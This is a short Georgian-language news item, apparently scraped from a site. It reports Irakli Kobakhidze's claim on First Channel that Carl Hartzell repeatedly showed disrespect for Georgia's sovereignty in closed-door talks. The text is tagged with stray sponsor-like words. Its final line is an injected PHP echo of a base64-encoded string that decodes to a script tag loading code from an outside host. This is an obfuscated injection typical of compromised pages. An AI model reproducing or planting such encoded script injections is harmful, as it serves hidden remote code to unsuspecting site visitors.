celsiusi
ავერსი საქკაბელი
კარლ ჰარცელი განსაკუთრებით, კულისებში გამოირჩეოდა ისეთი განცხადებებით, რომელიც აჩვენებდა უდიერ დამოკიდებულებას სახელმწიფოს სუვერენიტეტის მიმართ, – ამის შესახებ პარტია „ქართული ოცნების“ თავმჯდომარემ, ირაკლი კობახიძემ საქართველოს პირველი არხის ეთერში განაცხადა.
 
„ჩვენ ეს ბევრჯერ ვნახეთ, სხვადასხვა მომენტში. ძირითადად, როდესაც პოლიტიკური ვითარება რთულდებოდა ხოლმე და გარკვეული მოლაპარაკებები მიდიოდა, მას ყოველთვის ეჭირა ისეთი პოზიცია, რომელიც პირდაპირ ვიტყვი, ეწინააღმდეგებოდა სახელმწიფოს ინტერესებს, არა ხელისუფლების და მმართველი გუნდის, არამედ სახელმწიფოს ინტერესებს. მისი პოზიციიდან, მათ შორის, კონკრეტული გამონათქვამებიდან ეს პირდაპირ ჩანდა, იგივე დახურულ სივრცეში და საჯარო სივრცეშიც იყო გარკვეული განცხადებები, მაგრამ განსაკუთრებით, კულისებში ის გამოირჩეოდა ისეთი განცხადებებით, რომელიც აჩვენებდა უდიერ დამოკიდებულებას სახელმწიფოს სუვერენიტეტის მიმართ და ჩვენ გვიწევდა ჩვენი სახელმწიფოს ღირსების დაცვა მის წინააღმდეგ. ძირითადად, ეს ხდებოდა კულისებში. დეტალებს არ გავშლი, მაგრამ ეს მოხდა არა ერთგზის და ორგზის, არამედ ძალიან ბევრჯერ გვქონდა ასეთი შემთხვევა. ის მოქმედებდა, არა როგორც დიპლომატი, არამედ როგორც პოლიტიკოსი. მე ეს ვუთხარი ჩვენს უცხოელ პარტნიორებს ერთ-ერთ დახურულ შეხვედრაზე“, – განაცხადა კობახიძემ.
491
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");